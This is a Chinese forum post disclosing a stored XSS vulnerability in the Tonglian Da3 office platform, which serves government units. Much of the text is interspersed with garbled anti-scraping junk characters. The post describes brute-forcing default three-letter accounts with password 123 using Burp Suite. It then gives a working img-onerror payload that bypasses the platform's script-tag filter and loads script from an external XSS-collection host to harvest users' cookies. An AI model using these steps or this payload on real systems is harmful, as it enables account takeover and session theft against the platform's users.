* g0 Q; _0 S+ [" j
6 X5 b/ [, R1 X& `
同联Da3协同办公平台后台通用储存型xss漏洞) n; R2 j! t) Y* k2 |; o
5 F4 j1 p' c0 \ }7 L* i3 D% i2 Q1 G( K1 P1 Q E
平台简介:
; \( i/ L6 u! B* ^( m: J: \( w
, E- l- o' V) ^1 ~
: J4 W3 |* n( o; ? 4 E7 J z8 `. m( |
6 Z+ T$ A: s: f# X8 \9 I; u
+ |4 j' v9 O/ E( p: f" P2 l
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
. z7 u* r1 }) g4 E* b同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
) |) E" L7 r/ n- D6 q
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!9 Q5 H; G& q7 w: G% T6 ?" a
0 I' Y, E$ S0 f$ |. G4 S) w
, J$ ^$ j, g5 j, J+ P. Z0 H: F " Y6 _5 p% `+ ]& x+ R2 s- X3 \
+ \4 D) ^- g. a6 ^) @ + P/ c& ~2 e8 j8 g
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:; W7 }! r( `& j% t/ u
% { f" a! C" r
! N R: S; {9 M- c ( |* C% J+ n6 V' q' q7 Z
( V* F# _( t3 b3 Y* }' x; T 6 e5 G" p0 o8 `8 p& U; D
http://1.1.1.1:7197/cap-aco/#(案例2-)7 R8 f& G1 u3 x" k4 l1 ~+ e/ Z& a
1 {7 Q5 e" H$ L . f w- B) Y( N: w; G. ]- p5 b9 v5 j
http://www.XXOO.com (案例1-官网网站)/ i6 \2 ~ `5 B! Q/ }
2 k4 ]+ R% E5 `+ i - k, ^ N( I$ U" i
漏洞详情:: Z8 }7 q9 q- x" [ S, e. e. H& i
; g. ]: K. K7 H4 _+ U0 L
( ^$ r6 _) c N 案例一、
' M9 B, ]/ u" w
" ?- B/ \" Q# l+ J1 ^5 `
0 Y/ g! B! d7 C2 j' I 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
' ~7 p9 H0 ]/ M
e8 }5 ^1 M5 J4 J: l9 R
/ s; V' B' K, [/ y 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
8 W+ |, b" R- C0 ^: S6 U
: s1 O8 n( N& b( k7 j4 g# ^* s ! g+ a. m; k1 J) V/ G7 L
3 M7 v) k# q- e* b! E' N$ g
9 T6 U3 }% c1 }: X 1 J, c1 T, e2 H8 q7 X
# P ^9 R$ V. [9 i5 i; w! h$ k$ B% f6 K
& ?6 `1 ~/ e, _& M/ ^, C& E
5 g- D& c5 s8 x# `
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
) Q, m( E- ~5 q1 e) m3 ^
2 R$ d& Y( P. b, ~. Y# n
! E+ ?4 d- y3 ~; \2 s8 }' }
; g8 u4 J& a5 P0 ?) E4 I& ]& ]
3 m- X7 Q$ x0 M* @+ E* C3 C( c2 ?
g% O, X/ I S. _1 K 
4 ]6 Z& a! O. v+ J; H& c n
, @4 o. S4 C. s5 u; `( q
7 T7 r9 [. l C- {3 b$ {) h 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 3 Y3 V" o1 K# a9 T! _# ]
( [; }9 i5 b% ~/ w( {, O+ R . ]8 ]' d/ ]* ~
f1 |( p0 t0 a: S
9 G O& l" f- J5 Q
. }% e7 {+ Q: c5 U$ v
<img src=x
, {: x. V4 Y2 \3 l3 @( i# F6 |$ Tonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 1 P7 w7 ]9 K* G" I& l" r
4 p- |0 q8 ?* {0 b! J
: ], d4 }; y* W1 Z
6 G* X6 n& J6 B0 O a
. s }9 {3 M: E" p0 }
: H' ]; `0 w z P 然后发送,接收cookie如图: 7 @" F0 l9 e3 w0 L4 L
) z, k5 e6 C& b- x. l $ p9 a; M& ^" C7 T* y5 F
7 o/ U, k0 O) E' f" L
T" {7 g, @$ {, j* f" t
- F% U( k1 i' @- A3 Y+ X2 [% V2 e
9 B7 c u; V! L4 P0 l+ d) n
( ]% s1 \9 ~$ {
9 Q4 V, ~7 A2 F1 ?( v# [
2 b4 N3 w/ I+ K/ R9 C9 P% U
f& @0 \0 x: k; |* C ; P# @1 d, |3 l
$ a6 Z0 z4 `& R
- d+ V9 _4 O; E( f- R/ G
. h0 O1 C q0 n$ g% l0 l; z 
3 j( }, n: x6 d
4 y! R$ u* }* D) N# S
* F& U, A2 r3 I3 f7 `" K
; R; `: Q/ \0 W: S' b& y) I
: D) p! l& w9 Q/ V9 Y
5 k) W7 U H$ v6 E( }, R1 R. k $ V5 Q8 q# j/ j4 ?3 o/ M
2 G3 |9 T3 g* {: p( y6 G: f' s6 H - Y7 O6 i9 p; @: ]+ |, l
案例2、 - T5 X; ~" C3 ?7 s
$ Z7 J3 ^- G/ K
5 {: e7 c8 E; O9 Z+ Q# F, y
前面步骤都一样,下面看效果图: " ]4 H# ]! E P6 Q
4 X+ k7 Z% q1 `8 ]5 K7 x, i
. y1 Z. M- V. x5 p 
! F5 M/ g& |/ B2 j E+ w& o0 b
" g( Z) S/ y* H- u
" t2 M$ H' G R" n0 C6 N- q% g6 Z
* h& w. e3 g( z# b- e4 A" A
5 [3 F5 f4 g4 y1 H/ @( T' h 6 v6 k% r9 D) g7 S: U
! m i N0 q$ T9 B4 ?- u' ]
2 F% b! I8 g1 ]# V
1 T: v7 q6 [: Y8 |" U0 J 6 s K( g7 n9 Q( ~ k
/ j" Y/ L! y8 R& _
2 Y# n, l+ R% w. A, D( x; V# F 
* R- G- X- V$ i3 ^0 w0 l' ]5 d4 w+ ?
@ b' Y; a3 J
: E/ W1 i3 o, T7 i! P+ u0 E; [! C N* S2 a P# Z- q* P! s
+ F" N# K9 P+ Y& Q) J
- T) o+ j9 C5 K
7 |& C: Q3 [ d/ y. ?" f: `# y* K
. Z; h4 w, J: M6 ?+ l {4 _; A% I8 W, {3 n$ D
2 s9 P9 a! W- L4 Y0 L
) E/ A- N! G. M2 [; `! o
" X6 q3 [' V8 { $ ~. x1 M _- e' z9 @8 W8 z
7 ?' ]& d3 S& \) @( D: y [/ l 
发表于 2018-10-20 20:14:15
收藏
支持
反对